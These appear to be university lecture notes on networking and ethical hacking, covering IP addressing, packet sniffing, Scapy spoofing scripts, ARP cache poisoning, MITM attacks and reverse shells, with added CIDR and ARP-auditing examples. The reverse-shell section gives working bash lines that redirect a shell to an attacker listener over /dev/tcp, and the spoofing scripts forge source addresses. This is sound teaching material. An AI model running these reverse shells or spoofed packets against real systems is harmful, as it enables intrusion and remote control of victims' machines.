Week 9: Networks 1 - Ethical Hacking and Pentesting

Networking Basics (Recall)

  • IP Address and Network Interface:
    • Original IP Addressing Scheme
      • Class A: Begins with 0 (0.0.0.0 to 127.255.255.255)
      • Class B: Begins with 10 (128.0.0.0 to 191.255.255.255)
      • Class C: Begins with 110 (192.0.0.0 to 223.255.255.255)
      • Class D: Begins with 1110 (224.0.0.0 to 239.255.255.255)
      • Class E: Begins with 11110 (240.0.0.0 to 255.255.255.255)
    • CIDR (Classless Inter-Domain Routing) Scheme:
      • Uses a suffix to indicate the number of bits in the network ID (e.g., 192.168.60.5/24 indicates the first 24 bits are the network ID).
      • Example: What is the address range of the network 192.168.192.0/19?
    • Special IP Addresses:
      • Private IP Addresses:
        • 10.0.0.0/8
        • 172.16.0.0/12
        • 192.168.0.0/16
      • Loopback Address:
        • 127.0.0.0/8 (commonly 127.0.0.1)
    • Listing IP Addresses:
      • Using the command: $ ip -br address
      • Example output includes interfaces like lo, enp0s3, docker0 with their respective IP addresses and other details.
    • Manually Assigning IP Addresses:
      • Command: $ sudo ip addr add 192.168.60.6/24 dev enp0s3
      • This assigns the IP address 192.168.60.6 with a /24 subnet mask to the enp0s3 interface.
    • Automatically Assigning IP Addresses:
      • DHCP (Dynamic Host Configuration Protocol)
    • DNS (Domain Name System):
      • Used to get IP addresses for hostnames.
      • Example using dig: $ dig www.example.com
      • Returns the IP address associated with the domain name.
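A worked version of the addressing recall above, added here rather than taken from the lecture: it derives the range of the example network 192.168.192.0/19 with plain bit arithmetic (cross-checked against Python's ipaddress module), classifies an address under the original classful scheme, and tests the private and loopback blocks listed above. The helper names are assumptions.

```python
#!/usr/bin/python3
# Added example, not from the lecture notes: classful class, CIDR range and
# private/loopback membership computed with bit arithmetic.
import ipaddress

PRIVATE_BLOCKS = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")

def ip_to_int(ip):
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

def int_to_ip(n):
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def ip_class(ip):
    # Original classful scheme: look at the leading bits of the first octet.
    first = ip_to_int(ip) >> 24
    if first & 0x80 == 0x00: return "A"   # 0xxxxxxx
    if first & 0xC0 == 0x80: return "B"   # 10xxxxxx
    if first & 0xE0 == 0xC0: return "C"   # 110xxxxx
    if first & 0xF0 == 0xE0: return "D"   # 1110xxxx
    return "E"                            # 11110xxx

def cidr_range(cidr):
    """Return (first address, last address, netmask) of a CIDR block."""
    addr, prefix = cidr.split("/")
    prefix = int(prefix)
    if not 0 <= prefix <= 32:
        raise ValueError(f"bad prefix length: {prefix}")
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF   # top `prefix` bits set
    network = ip_to_int(addr) & mask                     # host bits cleared
    broadcast = network | (~mask & 0xFFFFFFFF)           # host bits all ones
    return int_to_ip(network), int_to_ip(broadcast), int_to_ip(mask)

def in_block(ip, cidr):
    first, last, _ = cidr_range(cidr)
    return ip_to_int(first) <= ip_to_int(ip) <= ip_to_int(last)

def describe(ip):
    return {"class": ip_class(ip),
            "private": any(in_block(ip, b) for b in PRIVATE_BLOCKS),
            "loopback": in_block(ip, "127.0.0.0/8")}

if __name__ == "__main__":
    first, last, mask = cidr_range("192.168.192.0/19")   # the lecture's question
    net = ipaddress.ip_network("192.168.192.0/19")       # stdlib cross-check
    assert (first, last) == (str(net.network_address), str(net.broadcast_address))
    print(f"192.168.192.0/19: {first} - {last} (mask {mask})", describe("192.168.192.1"))
```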

TCP/IP Protocols

  • Network Stack:
    • A layered architecture for network communication.
  • Packet Journey:
    • A packet travels from source A to destination B through multiple routers and networks.
  • Packet Construction:
    • Application Layer: Creates the data.
    • Transport Layer: Adds TCP or UDP header with source and destination ports.
    • Network Layer: Adds IP header with source and destination IP addresses.
    • MAC Layer: Adds MAC header with source and destination MAC addresses.
  • Transport Layer (Layer 4):
    • Includes source and destination ports.
    • Uses TCP or UDP headers.
  • Network Layer (Layer 3):
    • Constructs packets and handles routing.
    • Includes source and destination IP addresses.
  • Data Link Layer (Layer 2):
    • Adds MAC header with destination and source addresses.
  • Sending Packets in Python:
    • UDP Client Example:
      ```python
      #!/usr/bin/python3
      import socket

      IP = "127.0.0.1"
      PORT = 9090
      data = b'Hello, World!'

      # SOCK_DGRAM selects UDP: no connection is set up, the datagram is just sent
      sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      sock.sendto(data, (IP, PORT))
      ```
    • UDP Server Example:
      ```python
      #!/usr/bin/python3
      import socket

      IP = "0.0.0.0"   # bind to all local interfaces
      PORT = 9090

      sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      sock.bind((IP, PORT))
      while True:
          # recvfrom returns the payload and the sender's (ip, port)
          data, (ip, port) = sock.recvfrom(1024)
          print("Sender: {} and Port: {}".format(ip, port))
          print("Received message: {}".format(data))
      ```
  • Receiving Packets:
    • Packets are received through the network interface card (NIC) and processed up the network stack.
  • Routing:
    • Routing tables determine the path packets take.
  • ip route Command:
    • Used to display and manipulate the routing table.
    • Examples:
      • # ip route (shows the routing table)
      • # ip route get 10.9.0.1 (gets the route for 10.9.0.1)
  • Packet Sending Tools:
    • netcat (nc):
      • $ nc <ip> <port> (sends TCP packet)
      • $ nc -u <ip> <port> (sends UDP packet)
      • $ echo "data" > /dev/udp/<ip>/<port>
      • $ echo "data" > /dev/tcp/<ip>/<port>
    • Others: telnet, ping, etc.

Packet Sniffing

  • Packet Reception Process:
    • Link-level driver captures packets and stores them in a ring buffer.
    • The kernel's protocol stack processes the packets.
  • Getting a Copy of Packets:
    • Packet sniffing involves capturing a copy of packets for analysis.
  • Packet Sniffing Tools:
    • Tcpdump: Command-line tool, good for containers.
    • Wireshark: GUI-based tool, good for environments supporting a GUI.

Packet Spoofing

  • Normal Packet Construction:
    • Users can set some header fields.
    • The OS sets other fields.
  • Packet Spoofing:
    • Setting arbitrary header fields using tools.
  • Spoofing ICMP Packets (using Scapy):
    ```python
    #!/usr/bin/python3
    from scapy.all import *

    print("SENDING SPOOFED ICMP PACKET...")
    ip = IP(src="1.2.3.4", dst="93.184.216.34")   # IP layer with a forged source address
    icmp = ICMP()                                  # ICMP echo request by default
    pkt = ip/icmp
    pkt.show()
    send(pkt, verbose=0)                           # Layer 3 send; requires root
    ```
  • Spoofing UDP Packets (using Scapy):
    ```python
    #!/usr/bin/python3
    from scapy.all import *

    print("SENDING SPOOFED UDP PACKET...")
    ip = IP(src="1.2.3.4", dst="10.0.2.69")   # IP Layer
    udp = UDP(sport=8888, dport=9090)         # UDP Layer
    data = "Hello UDP!\n"                     # Payload
    pkt = ip/udp/data
    pkt.show()
    send(pkt, verbose=0)
    ```
  • Other Uses of Scapy:
    • send(): Send packets at Layer 3.
    • sendp(): Send packets at Layer 2.
    • sr(): Sends packets at Layer 3 and receives answers.
    • srp(): Sends packets at Layer 2 and receives answers.
    • sr1(): Sends packets at Layer 3 and returns only the first answer.
    • sr1p(): Sends packets at Layer 2 and returns only the first answer.
    • srloop(): Send a packet at Layer 3 in a loop and print the answer each time.
    • srploop(): Send a packet at Layer 2 in a loop and print the answer each time.

ARP Protocol and Attacks

  • Network Interface:
    • Physical or logical link between a computer and a network.
    • Each NIC has a hardware address: MAC address.
  • Packet Flow:
    • Packets flow through the link-level driver, ring buffer, and protocol stack.
  • Physical and Virtual NICs:
    • Physical interface.
    • Loopback/dummy interface.
    • tun/tap interface.
  • Examples of Virtual NIC:
    • Loopback Interface:
      • $ ifconfig lo
      • Typically has the IP address 127.0.0.1.
    • Dummy Interface:
      • # ip link add dummy1 type dummy
      • # ip addr add 1.2.3.4/24 dev dummy1
      • # ip link set dummy1 up
  • Ethernet Frame & MAC Header:
    • MAC Header (Ethernet Header): 14 bytes.
    • Contains destination MAC address, source MAC address, EtherType, data, and checksum.
  • Ethernet Frame Example:
    • Shows the structure of an Ethernet frame with source and destination MAC addresses and the encapsulated IP packet.
  • Promiscuous Mode:
    • NIC normally checks the destination MAC address.
    • In promiscuous mode, the NIC accepts all packets on the local network, regardless of the destination MAC address. Useful for packet sniffing.
  • MAC Address Randomization:
    • Used for privacy to prevent tracking by randomizing the MAC address.

The ARP Protocol

  • ARP (Address Resolution Protocol):
    • Used to find the MAC address associated with an IP address on a local network.
  • ARP Request/Reply:
    • A host broadcasts an ARP request to find the MAC address of another host.
    • The target host responds with an ARP reply containing its MAC address.
  • ARP Message Format:
    • Includes hardware type, protocol type, hardware size, protocol size, opcode, sender MAC address, sender IP address, target MAC address, and target IP address.
  • ARP Cache:
    • Used to store recently resolved IP-to-MAC address mappings to avoid sending frequent ARP requests.
    • Command: arp -n

ARP Cache Poisoning Attack

  • ARP Cache Poisoning:
    • Spoofing ARP messages (request, reply, gratuitous) to inject false IP-to-MAC address mappings into the ARP cache of victim machines.
  • Spoofing Gratuitous Message:
    • Special type of ARP message with source IP = destination IP and destination MAC = broadcast address.
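The ARP message format and the gratuitous-ARP definition above, as an added example rather than course code: a parser for raw ARP-over-Ethernet frames plus a small audit that flags gratuitous messages and any change in the MAC an IP claims, which is the symptom a defender watches for when a cache is being poisoned. The frames it checks are constructed inline; the function names and the sample MAC/IP values are assumptions.

```python
# Added example, not from the lecture notes: parse raw ARP frames, flag gratuitous ARP, alert on MAC changes.
import struct
BROADCAST = "ff:ff:ff:ff:ff:ff"
ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType (14 bytes)
ARP_MSG = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes.fromhex(s.replace(":", ""))
def ip_bytes(s): return bytes(int(o) for o in s.split("."))

def parse_arp_frame(frame):
    """Return the ARP fields as a dict, or None if this is not IPv4 ARP over Ethernet."""
    if len(frame) < ETH_HDR.size + ARP_MSG.size:
        return None
    dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != 0x0806:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_MSG.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"dst_mac": mac_str(dst), "src_mac": mac_str(src), "opcode": op,
            "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
            "target_mac": mac_str(tha), "target_ip": ip_str(tpa)}

def is_gratuitous(msg):
    # Gratuitous ARP as defined above: sender IP == target IP, sent to the broadcast MAC.
    return msg["sender_ip"] == msg["target_ip"] and msg["dst_mac"] == BROADCAST

def build_arp_frame(dst_mac, src_mac, op, sha, spa, tha, tpa):
    # Builds constructed sample frames (bytes only) so the parser can be exercised offline.
    return (ETH_HDR.pack(mac_bytes(dst_mac), mac_bytes(src_mac), 0x0806) +
            ARP_MSG.pack(1, 0x0800, 6, 4, op, mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa)))

def audit_arp(frames):
    """Track each sender IP's claimed MAC; report gratuitous messages and mapping changes."""
    table, alerts = {}, []
    for msg in filter(None, map(parse_arp_frame, frames)):
        ip, mac = msg["sender_ip"], msg["sender_mac"]
        if is_gratuitous(msg):
            alerts.append(f"gratuitous ARP: {ip} claims {mac}")
        if ip in table and table[ip] != mac:
            alerts.append(f"mapping change: {ip} was {table[ip]}, now {mac}")
        table[ip] = mac
    return table, alerts

A, B, C = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
SAMPLE_FRAMES = [  # constructed: A asks for B, B replies, then a third MAC re-claims B's IP
    build_arp_frame(BROADCAST, A, 1, A, "10.0.2.5", "00:00:00:00:00:00", "10.0.2.6"),
    build_arp_frame(A, B, 2, B, "10.0.2.6", A, "10.0.2.5"),
    build_arp_frame(BROADCAST, C, 2, C, "10.0.2.6", BROADCAST, "10.0.2.6"),
]
```

Running `audit_arp(SAMPLE_FRAMES)` reports one gratuitous message and one mapping change, both for 10.0.2.6; on a real capture the same check runs over frames read from tcpdump or Wireshark output.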

Man-In-The-Middle Attack

  • Man-In-The-Middle (MITM) Attack:
    • An attacker intercepts and potentially alters communications between two parties without their knowledge.
    • Uses ARP cache poisoning to redirect packets.
  • Using ARP Cache Poisoning to Redirect Packets:
    • Poison A's ARP cache so that B's IP is mapped to M's (attacker's) MAC address.
    • Poison B's ARP cache so that A's IP is mapped to M's MAC address.
  • Implication:
    • The attacker can receive packets sent from A to B and B to A, enabling various attacks using sniffing and spoofing.

Reverse Shell (Recall)

  • File Descriptor:
    • A number that uniquely identifies an open file or input/output resource.
  • File Descriptor Table:
    • Associates file descriptors with open files.
    • Standard file descriptors: 0 (stdin), 1 (stdout), 2 (stderr).
  • Standard I/O Devices:
    • Standard input (stdin): typically the keyboard.
    • Standard output (stdout): typically the screen.
    • Standard error (stderr): typically the screen.
  • Redirection:
    • Changing the default input or output stream of a command.
    • Examples:
      • $ echo "hello world" > /tmp/xyz (redirects output to a file)
      • $ cat < /etc/passwd (redirects input from a file)
  • Output Redirection to TCP Connections:
    • Using dup2 to redirect standard output to a TCP socket.
  • Input Redirection to TCP Connections:
    • Using dup2 to redirect standard input from a TCP socket.
  • Redirection to TCP from Shell:
    • Using /dev/tcp/<ip>/<port> in bash for redirection.
  • Reverse Shell Overview:
    • Attacker Machine listens for a connection.
    • Victim Machine connects to the Attacker Machine and redirects its shell's input and output to the connection.
  • Redirecting Standard Output:
    • On Attacker Machine: $ nc -lv 9090
    • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090
  • Redirecting Standard Input & Output:
    • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1
  • Redirecting Standard Error, Input, & Output:
    • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1 2>&1
  • Reverse Shell via Code Injection:
    • Using injected code to execute a reverse shell.
    • First run bash: command bash
  • Summary:
    • Reverse shell works by redirecting a shell program’s input and output.
    • Input and output of a program can be redirected to a TCP connection.
    • It is a widely used technique by attackers.